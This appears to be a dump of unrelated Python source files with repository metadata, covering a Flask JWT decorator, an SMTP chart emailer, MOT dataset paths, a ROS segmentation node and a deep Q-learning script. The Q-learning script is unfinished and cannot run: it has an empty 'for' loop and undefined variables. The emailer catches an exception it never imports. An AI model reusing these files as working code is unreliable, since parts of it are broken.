] | 1 | 2020-04-14T18:12:11.000Z | 2020-04-14T18:12:11.000Z | taskmanager/src/modules/events/infrastructure/persistence/models/event_model.py | alice-biometrics/petisco-task-manager | 2bad52013ab122f8c3e5dce740dcd154883e6940 | [
"MIT"
] | 3 | 2020-04-20T10:35:26.000Z | 2020-06-15T07:45:59.000Z | taskmanager/src/modules/events/infrastructure/persistence/models/event_model.py | alice-biometrics/petisco-task-manager | 2bad52013ab122f8c3e5dce740dcd154883e6940 | [
"MIT"
] | 1 | 2021-03-12T13:48:01.000Z | 2021-03-12T13:48:01.000Z | from petisco.persistence.persistence import Persistence
from sqlalchemy import Column, Integer, String, JSON
Base = Persistence.get_base("taskmanager")
class EventModel(Base):
__tablename__ = "Event"
id = Column("id", Integer, primary_key=True)
event_id = Column("event_id", String(36))
type = Column("type", String(100))
data = Column("data", JSON)
| 25 | 55 | 0.712 | 46 | 375 | 5.630435 | 0.521739 | 0.081081 | 0.100386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015924 | 0.162667 | 375 | 14 | 56 | 26.785714 | 0.808917 | 0 | 0 | 0 | 0 | 0 | 0.090667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bfaaa304ed1acd0ac8c6f5beb7135584dfbb4b6e | 558 | py | Python | Literature-backend/utils/authorization.py | czl0325/Literature-python3 | e5b061f503b0a18a092b67469086f64b615f8604 | [
"MIT"
] | 7 | 2021-04-13T08:01:00.000Z | 2022-03-17T05:47:47.000Z | Literature-backend/utils/authorization.py | czl0325/Literature-python3 | e5b061f503b0a18a092b67469086f64b615f8604 | [
"MIT"
] | 1 | 2022-01-01T13:43:24.000Z | 2022-01-01T13:43:24.000Z | Literature-backend/utils/authorization.py | czl0325/Literature-python3 | e5b061f503b0a18a092b67469086f64b615f8604 | [
"MIT"
] | 1 | 2021-07-14T04:13:57.000Z | 2021-07-14T04:13:57.000Z | import functools
from flask import g, request
from lib.jwt_utils import verify_jwt
def LoginRequired(view_func):
@functools.wraps(view_func)
def check_auth(*args, **kwargs):
g.user_id = None
auth = request.headers.get('token')
payload = verify_jwt(auth)
if payload:
g.user_id = payload.get('user_id')
return view_func(*args, **kwargs)
else:
from utils.response_code import RET, ResponseData
return ResponseData(RET.TOKENERROR).to_dict()
return check_auth
| 27.9 | 61 | 0.645161 | 71 | 558 | 4.887324 | 0.507042 | 0.069164 | 0.040346 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.263441 | 558 | 19 | 62 | 29.368421 | 0.844282 | 0 | 0 | 0 | 0 | 0 | 0.021505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bfac88aa2efc80d3e0ff9e391c7c17befe2acae2 | 2,661 | py | Python | backend/emailer.py | amm042/Flower | fb28defb27a30b2cd59c21e4f0adb21ed0a541e7 | [
"MIT"
] | 3 | 2017-10-28T23:21:56.000Z | 2018-03-27T18:52:18.000Z | backend/emailer.py | amm042/Flower | fb28defb27a30b2cd59c21e4f0adb21ed0a541e7 | [
"MIT"
] | 276 | 2017-10-27T16:25:22.000Z | 2018-05-03T20:55:47.000Z | backend/emailer.py | amm042/Flower | fb28defb27a30b2cd59c21e4f0adb21ed0a541e7 | [
"MIT"
] | 2 | 2017-11-28T01:44:42.000Z | 2018-11-16T14:09:37.000Z | import os
import subprocess
import smtplib
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
EMAIL_HTML_START = '<html><head></head><body><p>'
EMAIL_HTML_END = '</p></body></html>'
"""
Send Email with attachments and text
attachments should be a list of objects that can be attached to a MIMEMultipart obj
"""
def sendEmail(sender, receivers, subject, body, attachments, is_body_html=False):
assert type(attachments) is list
assert type(receivers) is list
msg = MIMEMultipart()
text = MIMEText(body, 'html') if is_body_html else MIMEText(body)
# attach elements to email
msg.attach(text)
[msg.attach(attachment) for attachment in attachments]
# me == the sender's email address
# you == the recipient's email address
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ','.join(receivers)
try:
smtpObj = smtplib.SMTP('smtp.bucknell.edu')
smtpObj.sendmail(sender, receivers, msg.as_string())
# TODO: log this message instead of printing to console
print("Successfully sent email")
smtpObj.quit()
except SMTPException as e:
# TODO: log this message instead of printing to console
print("Error: unable to send email: {}".format(e))
"""
Installs highcharts-export-server if not already installed.
Returns 0 if successful, returns 1 if export server is not installed at the
expected path and could not be installed.
"""
eServerPath = "./node_modules/.bin/highcharts-export-server"
eServerName = "highcharts-export-server"
def prepareChartExport():
if not os.path.isfile(eServerPath):
if 0 != os.system("module load node && export ACCEPT_HIGHCHARTS_LICENSE=TRUE && npm install " + eServerName):
raise ImportError("Could not install chart export server")
"""
Generates a PNG image from a JSON Object
Assumes highcharts-export-server is present in the working directory
param chartJSON: A JSON string representing the chart being exported.
returns: A PNG MIMEImage object
"""
def exportChart(chartJSON): # TODO: Handle errors
prepareChartExport()
# Write chartJSON into chart.json
fp = open('chart.json', 'w')
fp.write(chartJSON)
fp.close()
# Run export server to create chart.png file
eServerCommand = "module load node && " + eServerPath + " -infile chart.json -outfile chart.png"
subprocess.check_output(eServerCommand, shell=True)
# Return chart.png image
fp = open('chart.png', 'rb') # Open in write binary mode
chartImage = MIMEImage(fp.read())
fp.close()
return chartImage
| 32.851852 | 117 | 0.705374 | 352 | 2,661 | 5.295455 | 0.434659 | 0.045064 | 0.04721 | 0.019313 | 0.052575 | 0.052575 | 0.052575 | 0.052575 | 0.052575 | 0.052575 | 0 | 0.001399 | 0.193912 | 2,661 | 80 | 118 | 33.2625 | 0.867599 | 0.130026 | 0 | 0.047619 | 0 | 0 | 0.221909 | 0.071146 | 0 | 0 | 0 | 0.025 | 0.047619 | 1 | 0.071429 | false | 0 | 0.166667 | 0 | 0.261905 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bfb00b3878976eb401bb6b11b7726def9ea5c5a6 | 5,632 | py | Python | lib/datasets/mot_info.py | liuqk3/GSM | 188965b3a11f9cdbe166d79cac7cd2e9fb4c1785 | [
"MIT"
] | 3 | 2021-06-16T13:06:27.000Z | 2021-12-27T03:52:51.000Z | lib/datasets/mot_info.py | liuqk3/GSM | 188965b3a11f9cdbe166d79cac7cd2e9fb4c1785 | [
"MIT"
] | 5 | 2021-08-25T16:16:51.000Z | 2022-03-12T00:57:46.000Z | lib/datasets/mot_info.py | liuqk3/GSM | 188965b3a11f9cdbe166d79cac7cd2e9fb4c1785 | [
"MIT"
] | 1 | 2021-12-01T13:31:38.000Z | 2021-12-01T13:31:38.000Z | from lib.utils.misc import detect_os
MOT_info = {
"readme": "The sequences in MOT16 and MOT17 are the same, while the sequences in 2DMOT2015 are "
"not all the same with those in MOT17. To handle this, we filter 2DMOT2015 dataset, "
"i.e. those sequences that are contained in MOT17 will not be included in 2DMOT2015",
'year': ['MOT15', 'MOT16', 'MOT17', 'MOT20'],
'base_path': {
'MOT15': {
'im': '/home/liuqk/Dataset/MOT/2DMOT2015',
'label':'/home/liuqk/Dataset/MOT/2DMOT2015',
},
'MOT16': {
'im': '/home/liuqk/Dataset/MOT/MOT17Det',
'label':'/home/liuqk/Dataset/MOT/MOT16Labels',
},
'MOT17': {
'im': '/home/liuqk/Dataset/MOT/MOT17Det',
'label': '/home/liuqk/Dataset/MOT/MOT17Labels',
},
'MOT20': {
'im': '/home/liuqk/Dataset/MOT/MOT20',
'label': '/home/liuqk/Dataset/MOT/MOT20',
},
'MOT16-det-dpm-raw': '/home/liuqk/Dataset/MOT/MOT16-det-dpm-raw/',
},
'sequences': {
'MOT15': {
'train': ['ETH-Bahnhof', 'ETH-Sunnyday', 'KITTI-13', 'KITTI-17', 'PETS09-S2L1', 'TUD-Campus',
'TUD-Stadtmitte'],
'test': ['ADL-Rundle-1', 'ADL-Rundle-3', 'AVG-TownCentre', 'ETH-Crossing', 'ETH-Jelmoli', 'ETH-Linthescher',
'KITTI-16', 'KITTI-19', 'PETS09-S2L2', 'TUD-Crossing', 'Venice-1'],
'val': []
},
'MOT16': {
'train': ['MOT16-04', 'MOT16-11', 'MOT16-05', 'MOT16-13', 'MOT16-02'], #, 'MOT16-10', 'MOT16-09'],
'test': ['MOT16-12', 'MOT16-03', 'MOT16-01', 'MOT16-06', 'MOT16-07', 'MOT16-08', 'MOT16-12', 'MOT16-14'],
'val': ['MOT16-09', 'MOT16-10']
},
'MOT17': {
'train': ['MOT17-04', 'MOT17-11', 'MOT17-05', 'MOT17-13', 'MOT17-02'],
'test': ['MOT17-03', 'MOT17-01', 'MOT17-06', 'MOT17-07', 'MOT17-08', 'MOT17-12', 'MOT17-14'],
'val': ['MOT17-10', 'MOT17-09']
},
'MOT20':{
'train':['MOT20-01', 'MOT20-02', 'MOT20-03', 'MOT20-05'],
'test': ['MOT20-04', 'MOT20-06', 'MOT20-07', 'MOT20-08'],
'val': [],
},
},
'detectors': {
'MOT15': {
'train': [''],
'val': [''],
'test': ['']
},
'MOT16': {
'train': [''],
'val': [''],
'test': ['']
},
'MOT17': {
'train': ['DPM'],
'val': ['DPM'], #['SDP', 'FRCNN', 'DPM'],
'test': ['DPM', 'SDP', 'FRCNN']
},
'MOT20': {
'train': [''],
'val': [''],
'test': ['']
},
},
}
def get_mot_info():
mot_info = MOT_info.copy()
# modify the path based on the OS
operate_system = detect_os()
if operate_system == 'MAC_OS_X':
base_path = {
'MOT15': {
'im': '/Users/Qiankun/Learning/Dataset/MOT/2DMOT2015',
'label': '/Users/Qiankun/Learning/Dataset/MOT/2DMOT2015',
},
'MOT16': {
'im': '/Users/Qiankun/Learning/Dataset/MOT/MOT17Det',
'label': '/Users/Qiankun/Learning/Dataset/MOT/MOT16Labels',
},
'MOT17': {
'im': '/Users/Qiankun/Learning/Dataset/MOT/MOT17Det',
'label': '/Users/Qiankun/Learning/Dataset/MOT/MOT17Labels',
},
'MOT20': {
'im': '/Users/Qiankun/Learning/Dataset/MOT/MOT20',
'label': '/Users/Qiankun/Learning/Dataset/MOT/MOT20',
},
'MOT16-det-dpm-raw': '/home/liuqk/Dataset/MOT/MOT16-det-dpm-raw/',
}
elif operate_system == 'WINDOWS':
base_path = {
'MOT15': {
'im': 'F:\Datasets\MOT2DMOT2015',
'label': 'F:\Datasets\MOT2DMOT2015',
},
'MOT16': {
'im': 'F:\Datasets\MOT\MOT16',
'label': 'F:\Datasets\MOT\MOT16',
},
'MOT17': {
'im': 'F:\Datasets\MOT\MOT17',
'label': 'F:\Datasets\MOT\MOT17',
},
'MOT20': {
'im': 'F:\Datasets\MOT\MOT20',
'label': 'F:\Datasets\MOT\MOT20',
},
'MOT16-det-dpm-raw': '/home/liuqk/Dataset/MOT/MOT16-det-dpm-raw/',
}
elif operate_system == 'LINUX':
base_path = {
'MOT15': {
'im': '/home/liuqk/Dataset/MOT/2DMOT2015',
'label': '/home/liuqk/Dataset/MOT/2DMOT2015',
},
'MOT16': {
# 'im': '/home/liuqk/Dataset/MOT/MOT17Det',
# 'label': '/home/liuqk/Dataset/MOT/MOT16Labels',
'im': '/home/liuqk/Dataset/MOT/MOT16',
'label':'/home/liuqk/Dataset/MOT/MOT16',
},
'MOT17': {
# 'im': '/home/liuqk/Dataset/MOT/MOT17Det',
# 'label': '/home/liuqk/Dataset/MOT/MOT17Labels',
'im': '/home/liuqk/Dataset/MOT/MOT17',
'label':'/home/liuqk/Dataset/MOT/MOT17',
},
'MOT20': {
'im': '/home/liuqk/Dataset/MOT/MOT20',
'label': '/home/liuqk/Dataset/MOT/MOT20',
},
'MOT16-det-dpm-raw': '/home/liuqk/Dataset/MOT/MOT16-det-dpm-raw/',
}
else:
raise NotImplementedError('Unkonwn operating system {}'.format(operate_system))
mot_info['base_path'] = base_path
return mot_info
| 36.335484 | 120 | 0.457741 | 556 | 5,632 | 4.597122 | 0.219424 | 0.125196 | 0.150235 | 0.178404 | 0.483959 | 0.426448 | 0.368936 | 0.368936 | 0.368936 | 0.368936 | 0 | 0.098919 | 0.34304 | 5,632 | 154 | 121 | 36.571429 | 0.591892 | 0.04652 | 0 | 0.374101 | 0 | 0 | 0.459071 | 0.222637 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007194 | false | 0 | 0.007194 | 0 | 0.021583 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bfb039de17e3f2df74bac61d966e6421f6778c40 | 537 | py | Python | src/dama/data/web.py | elaeon/ML | 8b56c62a28c69987fc5dbd8a47406a3a22214371 | [
"Apache-2.0"
] | 4 | 2017-07-16T14:25:35.000Z | 2018-08-27T14:18:01.000Z | src/dama/data/web.py | elaeon/dama_ml | 8b56c62a28c69987fc5dbd8a47406a3a22214371 | [
"Apache-2.0"
] | 6 | 2017-10-06T16:46:13.000Z | 2019-02-12T23:51:01.000Z | src/dama/data/web.py | elaeon/dama_ml | 8b56c62a28c69987fc5dbd8a47406a3a22214371 | [
"Apache-2.0"
] | null | null | null | import tqdm
class HttpDataset(object):
def __init__(self, url, sess=None):
self.url = url
self.sess = sess
def download(self, filepath, chunksize):
response = self.sess.get(self.url)
with open(filepath, "wb") as f:
for chunk in tqdm.tqdm(response.iter_content(chunksize)):
if chunk:
f.write(chunk)
f.flush()
def from_data(self, dataset, chunksize=258):
self.download(dataset.filepath, chunksize=chunksize)
| 29.833333 | 69 | 0.577281 | 63 | 537 | 4.825397 | 0.52381 | 0.069079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008197 | 0.318436 | 537 | 17 | 70 | 31.588235 | 0.822404 | 0 | 0 | 0 | 0 | 0 | 0.003724 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bfb1cec8422d4ddf12fb71d0f3a2b6e8767d1860 | 1,791 | py | Python | deeplab_segment.py | Prakadeeswaran05/Simple-Tf-ObjectDetection-SemanticSegmentation-ROS | f119f0f8394c324c8453d540f4dfa495e34ee001 | [
"MIT"
] | 9 | 2021-04-29T14:30:16.000Z | 2022-01-26T16:39:34.000Z | deeplab_segment.py | Prakadeeswaran05/Tf-ObjectDetection-SemanticSegmentation-ROS | f119f0f8394c324c8453d540f4dfa495e34ee001 | [
"MIT"
] | null | null | null | deeplab_segment.py | Prakadeeswaran05/Tf-ObjectDetection-SemanticSegmentation-ROS | f119f0f8394c324c8453d540f4dfa495e34ee001 | [
"MIT"
] | null | null | null | import collections
import os
import io
import sys
import tarfile
import tempfile
import urllib
import rospy
from std_msgs.msg import Header
from sensor_msgs.msg import Image as ros_img
from notcv_bridge import *
from matplotlib import gridspec
from matplotlib import pyplot as plt
import numpy as np
from PIL import Image
import cv2
from model import DeepLabModel
import get_dataset_colormap
_TARBALL_NAME = 'deeplab_mnv3_large_cityscapes_trainfine_2019_11_15.tar.gz'
model_dir = '/home/ros/tf_ws/src/obj_det/scripts'
file_path = os.path.join(model_dir, _TARBALL_NAME)
model = DeepLabModel(file_path)
def callback(data):
out = imgmsg_to_cv2(data)
cv2_im = cv2.cvtColor(out, cv2.COLOR_BGR2RGB)
pil_im = Image.fromarray(cv2_im)
# Run model
resized_im, seg_map = model.run(pil_im)
# Adjust color of mask
seg_image = get_dataset_colormap.label_to_color_image(
seg_map, get_dataset_colormap.get_cityscapes_name()).astype(np.uint8)
# Convert PIL image back to cv2 and resize
frame = np.array(pil_im)
r = seg_image.shape[1] / frame.shape[1]
dim = (int(frame.shape[0] * r), seg_image.shape[1])[::-1]
resized = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)
seg_image = cv2.cvtColor(seg_image, cv2.COLOR_RGB2BGR)
resized = cv2.cvtColor(resized, cv2.COLOR_RGB2BGR)
# Stack horizontally color frame and mask
color_and_mask = np.hstack((resized, seg_image))
print(color_and_mask.shape)
cv2.imshow('frame', color_and_mask)
cv2.waitKey(1)
def main():
rospy.init_node('image_sub', anonymous=True)
rospy.Subscriber('camera/image_raw',ros_img,callback)
rospy.spin()
if __name__ == '__main__':
main()
cv2.destroyAllWindows()
| 24.202703 | 75 | 0.71971 | 264 | 1,791 | 4.617424 | 0.424242 | 0.039377 | 0.044299 | 0.02297 | 0.02461 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024105 | 0.18928 | 1,791 | 73 | 76 | 24.534247 | 0.815427 | 0.061977 | 0 | 0 | 0 | 0 | 0.077705 | 0.054991 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.391304 | 0 | 0.434783 | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bfc10809cb17d41c9d5e0845a79f7790e9acfb95 | 9,469 | py | Python | dnctest.py | nburn42/nburn42_deep_q | b353138c3aac4cb26222d012dd10de8a784e0ff1 | [
"MIT"
] | 4 | 2016-09-10T15:41:35.000Z | 2018-01-19T18:17:59.000Z | dnctest.py | nburn42/nburn42_deep_q | b353138c3aac4cb26222d012dd10de8a784e0ff1 | [
"MIT"
] | null | null | null | dnctest.py | nburn42/nburn42_deep_q | b353138c3aac4cb26222d012dd10de8a784e0ff1 | [
"MIT"
] | null | null | null | # Deep Q network
import gym
import numpy as np
import tensorflow as tf
import math
import random
import bisect
import nplot
# HYPERPARMETERS
H = 150
H2 = 150
batch_number = 500
gamma = 0.995
num_of_ticks_between_q_copies = 1000
explore_decay = 0.99999
min_explore = 0.05
max_steps = 499
max_episodes = 1500
memory_size = 20000
learning_rate = 1e-3
if __name__ == '__main__':
env = gym.make('LunarLander-v2')
env.monitor.start('training_dir', force=True)
#Setup tensorflow
print env.observation_space
print env.action_space
inputsize = env.observation_space.shape[0]
outputsize = env.action_space.n
tf.reset_default_graph()
input_width = 10
hidden_width = 10
lstm_width = input_width + hidden_width + hidden_width
lstm_size = 50
lstm_layer_count = 3
lstm_layers = []
# start layer
x_placeholder = tf.placeholder(tf.float32, [None, input_width])
hl_0 = tf.zeros([None, hidden_width])
ht_0 = tf.zeros([None, hidden_width])
state = tf.concat(1, [x_placeholder, h_0, h_t])
print "state size: ", state.get_shape()
lstm = rnn_cell.BasicLSTMCell(lstm_size, state_is_tuple=False)
stacked_lstm = rnn_cell.MultiRNNCell([lstm] * lstm_layer_count,
state_is_tuple=False)
# build lstm
for plan in range(lstm_layer_count):
for
wi = tf.Variable(tf.random_uniform([inputsize,lstm_width], -.01, .01))
bi = tf.Variable(tf.random_uniform([lstm_width], -.01, .01))
wf = tf.Variable(tf.random_uniform([inputsize,lstm_width], -.01, .01))
bf = tf.Variable(tf.random_uniform([lstm_width], -.01, .01))
i = tf.sigmoid(tf.matmul(wi,temp_input) + bi)
#First Q Network
w1 = tf.Variable(tf.random_uniform([inputsize,H], -.10, .10))
bias1 = tf.Variable(tf.random_uniform([H], -.10, .10))
w2 = tf.Variable(tf.random_uniform([H, H2], -.10, .10))
bias2 = tf.Variable(tf.random_uniform([H2], -.10, .10))
w3 = tf.Variable(tf.random_uniform([H2, outputsize], -.10, .10))
bias3 = tf.Variable(tf.random_uniform([outputsize], -.10, .10))
w1_prime = tf.Variable(tf.random_uniform([inputsize,H], -1.0, 1.0))
bias1_prime = tf.Variable(tf.random_uniform([H], -1.0, 1.0))
w2_prime = tf.Variable(tf.random_uniform([H,H2], -1.0, 1.0))
bias2_prime = tf.Variable(tf.random_uniform([H2], -1.0, 1.0))
w3_prime = tf.Variable(tf.random_uniform([H2, outputsize], -1, 1))
bias3_prime = tf.Variable(tf.random_uniform([outputsize], -1, 1))
#Make assign functions for updating Q prime's weights
w1_prime_update= w1_prime.assign(w1)
bias1_prime_update= bias1_prime.assign(bias1)
w2_prime_update= w2_prime.assign(w2)
bias2_prime_update= bias2_prime.assign(bias2)
w3_prime_update= w3_prime.assign(w3)
bias3_prime_update= bias3_prime.assign(bias3)
all_assigns = [
w1_prime_update,
w2_prime_update,
w3_prime_update,
bias1_prime_update,
bias2_prime_update,
bias3_prime_update]
#build network
states_placeholder = tf.placeholder(tf.float32, [None, env.observation_space.shape[0]])
hidden_1 = tf.nn.relu(tf.matmul(states_placeholder, w1) + bias1)
hidden_2 = tf.nn.relu(tf.matmul(hidden_1, w2) + bias2)
hidden_2 = tf.nn.dropout(hidden_2, .5)
Q = tf.matmul(hidden_2, w3) + bias3
hidden_1_prime = tf.nn.relu(tf.matmul(states_placeholder, w1_prime) + bias1_prime)
hidden_2_prime = tf.nn.relu(tf.matmul(hidden_1_prime, w2_prime) + bias2_prime)
hidden_2_prime = tf.nn.dropout(hidden_2_prime, .5)
Q_prime = tf.matmul(hidden_2_prime, w3_prime) + bias3_prime
action_used_placeholder = tf.placeholder(tf.int32, [None], name="action_masks")
action_masks = tf.one_hot(action_used_placeholder, outputsize)
filtered_Q = tf.reduce_sum(tf.mul(Q, action_masks), reduction_indices=1)
#we need to train Q
target_q_placeholder = tf.placeholder(tf.float32, [None,]) # This holds all the rewards that are real/enhanced with Qprime
loss = tf.reduce_sum(tf.square(filtered_Q - target_q_placeholder))
train = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#Setting up the enviroment
D = []
explore = 1.0
rewardList = []
past_actions = []
episode_number = 0
episode_reward = 0
reward_sum = 0
xmax = 1
ymax = 1
xind = 1
yind = 1
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
sess.run(all_assigns)
ticks = 0
for episode in xrange(max_episodes):
state = env.reset()
reward_sum = 0
for step in xrange(max_steps):
ticks += 1
#print state
xmax = max(xmax, state[xind])
ymax = max(ymax, state[yind])
if episode % 10 == 0:
q, qp = sess.run([Q,Q_prime], feed_dict={states_placeholder: np.array([state])})
print "Q:{}, Q_ {}".format(q[0], qp[0])
#print "T: {} S {}".format(ticks, state)
env.render()
if explore > random.random():
action = env.action_space.sample()
else:
#get action from policy
q = sess.run(Q, feed_dict={states_placeholder: np.array([state])})[0]
action = np.argmax(q)
explore = max(explore * explore_decay, min_explore)
new_state, reward, done, _ = env.step(action)
reward_sum += reward
#print reward
D.append([state, action, reward, new_state, done])
if len(D) > memory_size:
D.pop(0);
state = new_state
if done:
break
#Training a Batch
samples = random.sample(D, min(batch_number, len(D)))
#print samples
#calculate all next Q's together for speed
new_states = [ x[3] for x in samples]
all_q_prime = sess.run(Q_prime, feed_dict={states_placeholder: new_states})
y_ = []
state_samples = []
actions = []
terminalcount = 0
for ind, i_sample in enumerate(samples):
state_mem, curr_action, reward, new_state, done = i_sample
if done:
y_.append(reward)
terminalcount += 1
else:
#this_q_prime = sess.run(Q_prime, feed_dict={states_placeholder: [new_state]})[0]
this_q_prime = all_q_prime[ind]
maxq = max(this_q_prime)
y_.append(reward + (gamma * maxq))
state_samples.append(state_mem)
actions.append(curr_action);
sess.run([train], feed_dict={states_placeholder: state_samples, target_q_placeholder: y_, action_used_placeholder: actions})
if ticks % num_of_ticks_between_q_copies == 0:
sess.run(all_assigns)
print 'Reward for episode %f is %f. Explore is %f' %(episode,reward_sum, explore)
if True:#episode % 30 == 0:
teststate = [0 for x in xrange(env.observation_space.shape[0])]
#print "S: ", teststate
X=[]
Y=[]
Z=[]
ZR=[]
xmin = -xmax
xstep = xmax/100.0
ymin = -ymax
ystep = ymax/100.0
test_state_list = []
for x in nplot.drange(xmin,xmax, xstep):
for y in nplot.drange(ymin,ymax,ystep):
teststate[xind] = x
teststate[yind] = y
test_state_list.append([teststate[x] for x in xrange(len(teststate))])
test_q_list = sess.run(Q, feed_dict={states_placeholder:test_state_list})
zmax = max(map(max,test_q_list))
ind = 0
for x in nplot.drange(xmin,xmax, xstep):
XX = []
YY = []
ZZ = []
ZZR = []
for y in nplot.drange(ymin,ymax,ystep):
XX.append(x)
YY.append(y)
ZZ.append(test_q_list[ind][0])
ZZR.append(test_q_list[ind][1])
ind += 1
X.append(XX)
Y.append(YY)
Z.append(ZZ)
ZR.append(ZZR)
nplot.plot(X,Y,Z, ZR, xmin,ymax,zmax)
env.monitor.close()
| 34.684982 | 140 | 0.52656 | 1,129 | 9,469 | 4.192205 | 0.213463 | 0.033805 | 0.040566 | 0.060849 | 0.319882 | 0.269385 | 0.187619 | 0.095922 | 0.055779 | 0.039721 | 0 | 0.039009 | 0.369205 | 9,469 | 272 | 141 | 34.8125 | 0.75339 | 0.055655 | 0 | 0.064516 | 0 | 0 | 0.012444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.037634 | null | null | 0.026882 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bfc812b90b219bd86fe5f140919d65ec9bcddac7 | 563 | py | Python | Src/AlgorithmLimp.py | sanjeevmk/GLASS | 91c0954eab87d25d4866fea5c338f79fbca4f79e | [
"MIT"
] | 2 | 2022-03-22T17:36:14.000Z | 2022-03-27T05:03:39.000Z | Src/AlgorithmLimp.py | sanjeevmk/glass | 91c0954eab87d25d4866fea5c338f79fbca4f79e | [
"MIT"
] | null | null | null | Src/AlgorithmLimp.py | sanjeevmk/glass | 91c0954eab87d25d4866fea5c338f79fbca4f79e | [
"MIT"
] | null | null | null | import torch
torch.manual_seed(10)
torch.cuda.manual_seed_all(10)
import header
import init
import sys
import train_limp
import randomSample
import latentSpaceExplore_VanillaHMC,latentSpaceExplore_NUTSHmc
config = sys.argv[1]
training_params,data_classes,network_params,misc_variables,losses = init.initialize(config)
from torch.autograd import Variable
scale = Variable(torch.tensor(0.01)).cuda()
for rounds in range(training_params.roundEpochs):
train_limp.trainVAE(training_params,data_classes,network_params,losses,misc_variables,rounds,scale)
exit()
| 33.117647 | 103 | 0.841918 | 78 | 563 | 5.871795 | 0.538462 | 0.091703 | 0.078603 | 0.10917 | 0.165939 | 0.165939 | 0 | 0 | 0 | 0 | 0 | 0.015385 | 0.076377 | 563 | 16 | 104 | 35.1875 | 0.865385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bfc892ba58f5ff6da305ddd579103f6d443a641e | 11,165 | py | Python | medgen/db/dataset.py | reece/medgen | 8d57c058315f77769f2a2827737d56682e15dc91 | [
"Apache-2.0"
] | null | null | null | medgen/db/dataset.py | reece/medgen | 8d57c058315f77769f2a2827737d56682e15dc91 | [
"Apache-2.0"
] | null | null | null | medgen/db/dataset.py | reece/medgen | 8d57c058315f77769f2a2827737d56682e15dc91 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# from __future__ import absolute_import
from __future__ import unicode_literals, print_function
from pyrfc3339 import parse
import MySQLdb as mdb
import MySQLdb.cursors as cursors
import PySQLPool
from ..log import log, IS_DEBUG_ENABLED
DEFAULT_HOST = 'localhost'
DEFAULT_USER = 'medgen'
DEFAULT_PASS = 'medgen'
DEFAULT_DATASET = 'medgen'
SQLDATE_FMT = '%Y-%m-%d %H:%M:%S'
def EscapeString(value):
value = value.encode("utf-8")
value = mdb.escape_string(value)
return '"{}"'.format(value)
def SQLdatetime(pydatetime_or_string):
if hasattr(pydatetime_or_string, 'strftime'):
dtobj = pydatetime_or_string
else:
# assume pyrfc3339 string
dtobj = parse(pydatetime_or_string)
return dtobj.strftime(SQLDATE_FMT)
class SQLData(object):
"""
MySQL base class for config, select, insert, update, and delete of medgen linked databases.
TODO: more documentation on config.
"""
